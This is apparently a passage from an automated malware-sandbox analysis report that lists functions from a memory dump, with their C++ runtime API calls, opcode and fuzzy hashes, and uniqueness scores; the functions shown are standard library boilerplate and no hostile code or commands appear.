                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057873
                                                                                                            • int.LIBCPMT ref: 6F05788A
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0578E4
                                                                                                              • Part of subcall function 6F0599EC: __EH_prolog3.LIBCMT ref: 6F0599F3
                                                                                                              • Part of subcall function 6F0599EC: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F059A46
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0578C4
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0578F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_moneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 478446508-0
                                                                                                            • Opcode ID: 88a7a5ecf1d38c180c16b32c1caa57528760670e9cf0b042138981b88b2940ee
                                                                                                            • Instruction ID: d31c232bc5ea6bcd18f0f79d0327cbf110ab61cd2823a272255903f2b633b954
                                                                                                            • Opcode Fuzzy Hash: 88a7a5ecf1d38c180c16b32c1caa57528760670e9cf0b042138981b88b2940ee
                                                                                                            • Instruction Fuzzy Hash: 1731D631D0072A9BCF05DBA4CA41BBD7BB6BF85728F244509D8116F2C0DFB4A922DB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057A21, Relevance: 19.6, APIs: 13, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057A28
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057A32
                                                                                                            • int.LIBCPMT ref: 6F057A49
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057A83
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057AA3
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057AB0
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057ABD
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057AC7
                                                                                                            • int.LIBCPMT ref: 6F057ADE
                                                                                                            • numpunct.LIBCPMT ref: 6F057B01
                                                                                                              • Part of subcall function 6F059B8C: __EH_prolog3.LIBCMT ref: 6F059B93
                                                                                                              • Part of subcall function 6F059B8C: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F059BF9
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057B18
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057B38
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057B45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_numpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3789072155-0
                                                                                                            • Opcode ID: 1433a49a35e03dfe45134ab5d0d37a775803f6c8ddaff418429019e8b2db6ae6
                                                                                                            • Instruction ID: 9297474e1c0c8f7124d5ed38a7c8255b034a1092c7f6bcb47a5fcb9a1322dfcb
                                                                                                            • Opcode Fuzzy Hash: 1433a49a35e03dfe45134ab5d0d37a775803f6c8ddaff418429019e8b2db6ae6
                                                                                                            • Instruction Fuzzy Hash: B231D635900629DBCF05DBB4CA44BAEB7B2BF85328F244509E4116B3C0DFF0AA66D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0578F7, Relevance: 18.1, APIs: 12, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0578FE
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057908
                                                                                                            • int.LIBCPMT ref: 6F05791F
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057959
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057979
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057986
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057993
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05799D
                                                                                                            • int.LIBCPMT ref: 6F0579B4
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057A0E
                                                                                                              • Part of subcall function 6F059ABC: __EH_prolog3.LIBCMT ref: 6F059AC3
                                                                                                              • Part of subcall function 6F059ABC: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F059B16
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0579EE
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057A1B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3810176953-0
                                                                                                            • Opcode ID: 69a5bf2187823ac740f3134825a56c1568bd825f5a05d2a7bcf6841ccdcf6151
                                                                                                            • Instruction ID: d024556c3d8bef52c5d6fbfe43ec1c5de32c5e4f960c6436c96f077d63667808
                                                                                                            • Opcode Fuzzy Hash: 69a5bf2187823ac740f3134825a56c1568bd825f5a05d2a7bcf6841ccdcf6151
                                                                                                            • Instruction Fuzzy Hash: 4331EA319006299BCF05DBB4CB44BBDB7B2BF85328F24440AD8156F2C0CFB49A26DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • _free.LIBCMT ref: 6F0932BF
                                                                                                            • _free.LIBCMT ref: 6F0932D8
                                                                                                            • _free.LIBCMT ref: 6F093316
                                                                                                            • _free.LIBCMT ref: 6F09331F
                                                                                                            • _free.LIBCMT ref: 6F09332B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast
                                                                                                            • String ID: C
                                                                                                            • API String ID: 3291180501-1037565863
                                                                                                            • Opcode ID: d928ab485b118a04e9c1d804d805c0b22d21ed92eb95f29d1e8a2c1168005cab
                                                                                                            • Instruction ID: 140a03c877b8ae2763e99a5afeb4eb023bef63c25f0ca63de64be793181158f9
                                                                                                            • Opcode Fuzzy Hash: d928ab485b118a04e9c1d804d805c0b22d21ed92eb95f29d1e8a2c1168005cab
                                                                                                            • Instruction Fuzzy Hash: DDC14A75A012199BDB24CF28C995B9DB7F8FF49304F5085AAE84DA7390E731AE90DF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065681, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065688
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065692
                                                                                                            • int.LIBCPMT ref: 6F0656A9
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0656E3
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065703
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065710
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06571D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            • Opcode ID: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction ID: 14f898f53643ffd12c7355212039c740929d5f6069663ffd3f7648b3cce13b42
                                                                                                            • Opcode Fuzzy Hash: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction Fuzzy Hash: 2221D275904729DBCF12DFA4CA447BEBBB2BF45728F644509E8146B3C1CBB09A11CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057D9F, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057DA6
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057DB0
                                                                                                            • int.LIBCPMT ref: 6F057DC7
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057E01
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057E21
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057E2E
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057E3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            • Opcode ID: 914c515ce4cd085fa717c9631795854425726545fa8d2995c96d6d6a63a29ecc
                                                                                                            • Instruction ID: 29c03b0df334488b9de46ef62ddbf356835d52c2dc64a9034ec855aff6649ad0
                                                                                                            • Opcode Fuzzy Hash: 914c515ce4cd085fa717c9631795854425726545fa8d2995c96d6d6a63a29ecc
                                                                                                            • Instruction Fuzzy Hash: F321C375900729DBCF01DFA4CA417AE77B2AF49714F24450AE8146B2C1CBB49E21DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F09D196: _free.LIBCMT ref: 6F09D1BB
                                                                                                            • _free.LIBCMT ref: 6F09D4F9
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09D504
                                                                                                            • _free.LIBCMT ref: 6F09D50F
                                                                                                            • _free.LIBCMT ref: 6F09D563
                                                                                                            • _free.LIBCMT ref: 6F09D56E
                                                                                                            • _free.LIBCMT ref: 6F09D579
                                                                                                            • _free.LIBCMT ref: 6F09D584
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                            • Instruction ID: 00fd5a655ef350daad25bf58c216a07a86bcd47fff65a1c165316015cb0849cd
                                                                                                            • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                            • Instruction Fuzzy Hash: 6E118432582B05B6EB21AB70DC15FCB77AE5F04788F405915E2E9670D1F734B505A760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F056F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F056F19
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F056F23
                                                                                                            • int.LIBCPMT ref: 6F056F3A
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F056F5D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F056F74
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F056F94
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F056FA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2133458128-0
                                                                                                            • Opcode ID: 1f02383431417d2e704364c962b834b55c1670b1b20104cb882e2e2e9e3fc011
                                                                                                            • Instruction ID: 85b59cda0a89e93237c071790bb2503c759ee2962e28c5fb5a31d7c51450fc83
                                                                                                            • Opcode Fuzzy Hash: 1f02383431417d2e704364c962b834b55c1670b1b20104cb882e2e2e9e3fc011
                                                                                                            • Instruction Fuzzy Hash: 2C01D231E00629DBCF05DBA0CB447ADB7B2BF86328F240409E4156B2D0CFB4AD228B81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05773F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057749
                                                                                                            • int.LIBCPMT ref: 6F057760
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057783
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05779A
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0577BA
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0577C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 9d26d92e8c060d0257d123f3dd47935e691cb2c9337b93a5ae4dd15e3336a598
                                                                                                            • Instruction ID: 2202175d39c90a027f92a567e874e341179d5f5882a8e245b5dc20a5c03d4cf6
                                                                                                            • Opcode Fuzzy Hash: 9d26d92e8c060d0257d123f3dd47935e691cb2c9337b93a5ae4dd15e3336a598
                                                                                                            • Instruction Fuzzy Hash: E401D63590062E9BCF05DBA4CA41BBD77B5AF45328F24444AD8146F2C0DFB09925DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057615
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05761F
                                                                                                            • int.LIBCPMT ref: 6F057636
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057659
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057670
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057690
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05769D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 53eec97619b4877f7de97ee24ee3df925bb6e9ee75f541197ab2a5c39a9fae90
                                                                                                            • Instruction ID: 4bb1edc71a674681838f9a71042ee6961a25195a102d308e61c3c41f11600035
                                                                                                            • Opcode Fuzzy Hash: 53eec97619b4877f7de97ee24ee3df925bb6e9ee75f541197ab2a5c39a9fae90
                                                                                                            • Instruction Fuzzy Hash: 6601D2319046299BCF05DFA4CA80BBD77B2BF89328F244509D415AB2C0CFB4A9629B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0576A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0576AA
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0576B4
                                                                                                            • int.LIBCPMT ref: 6F0576CB
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0576EE
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057705
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057725
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057732
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: da1c2e017b4db7a04026c77da39b19ac149d1f09fe5ca3c81c45dd04067f2add
                                                                                                            • Instruction ID: 6d307cef2d3d7ef327241f59986be55c2b1e906198aa412c0975feb227e1ae17
                                                                                                            • Opcode Fuzzy Hash: da1c2e017b4db7a04026c77da39b19ac149d1f09fe5ca3c81c45dd04067f2add
                                                                                                            • Instruction Fuzzy Hash: 8101D23590462D9BCF05DBA4CB44BBEB7B2BF85328F244409D8116B2C1CFB0A926DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065557, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06555E
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065568
                                                                                                            • int.LIBCPMT ref: 6F06557F
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0655A2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0655B9
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0655D9
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0655E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 82a4d11eb1b3109ef3482a49506c1f3a633d6e9f55916059a67c8d14a1f3a0ec
                                                                                                            • Instruction ID: 826464c08333a62bf2303974e91dc2eb45b5aa4834feafb2aa3ec9c39f4052f0
                                                                                                            • Opcode Fuzzy Hash: 82a4d11eb1b3109ef3482a49506c1f3a633d6e9f55916059a67c8d14a1f3a0ec
                                                                                                            • Instruction Fuzzy Hash: 8F01F53A904729DBCF05DBA8CA547BD77B2BF85368F240509E4116B3C1DFB4AA52CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0654C2, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0654C9
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0654D3
                                                                                                            • int.LIBCPMT ref: 6F0654EA
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F06550D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065524
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065544
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065551
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 7f5efa1ec43b459f97a789edfc51d6b2168b44ae7cd35aa9052db226b29c08a6
                                                                                                            • Instruction ID: 9f070d5edea40ddc154b5beeb207c4d746b677adeb816319792b3fca2be7afcb
                                                                                                            • Opcode Fuzzy Hash: 7f5efa1ec43b459f97a789edfc51d6b2168b44ae7cd35aa9052db226b29c08a6
                                                                                                            • Instruction Fuzzy Hash: 7D01D639900625DBCF05DBA8CA547BD77B2AF45328F240409D8116B3C1DFB0D955CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065303, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06530A
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065314
                                                                                                            • int.LIBCPMT ref: 6F06532B
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F06534E
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065365
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065385
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            • Opcode ID: 66ba1d9f3965d7129c39076002f0efdb2bad12e8e6cd4a5a7a5c5d49088ef6b6
                                                                                                            • Instruction ID: c53367e5da18076c775b8cc2f6761c4e97f8ed00adfcba9b3de2d9db95452efa
                                                                                                            • Opcode Fuzzy Hash: 66ba1d9f3965d7129c39076002f0efdb2bad12e8e6cd4a5a7a5c5d49088ef6b6
                                                                                                            • Instruction Fuzzy Hash: 1101D635900625DBCF05DBA4CA407BDB7B2BF45728F244509E4116B2D1DFB0DE16CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05732C
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057336
                                                                                                            • int.LIBCPMT ref: 6F05734D
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F057370
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057387
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0573A7
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0573B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            • Opcode ID: 70a9f0e8a8a4549c25dbf9a1852c8ac23e281f55042a4921a1fe3906325a9cb9
                                                                                                            • Instruction ID: 1289b44a8b868c25471322ab210e593818f281368adeda875eacd70a10ff5302
                                                                                                            • Opcode Fuzzy Hash: 70a9f0e8a8a4549c25dbf9a1852c8ac23e281f55042a4921a1fe3906325a9cb9
                                                                                                            • Instruction Fuzzy Hash: 6C01D2319006299BCF05DBB4CB417ADB7B2BF45328F24404AE8116F3C0CFB0AA26DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057B52
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057B5C
                                                                                                            • int.LIBCPMT ref: 6F057B73
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • numpunct.LIBCPMT ref: 6F057B96
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057BAD
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057BCD
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057BDA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3064348918-0
                                                                                                            • Opcode ID: f461684dcc3cd167481320f616ee3ae41a26550e6c32e6800f1ce4ebd4e8dc80
                                                                                                            • Instruction ID: 2950db66ebe7ac7b1417a3be6e7b22a3d8238e3bcdaba23f943bc6d4ffb75648
                                                                                                            • Opcode Fuzzy Hash: f461684dcc3cd167481320f616ee3ae41a26550e6c32e6800f1ce4ebd4e8dc80
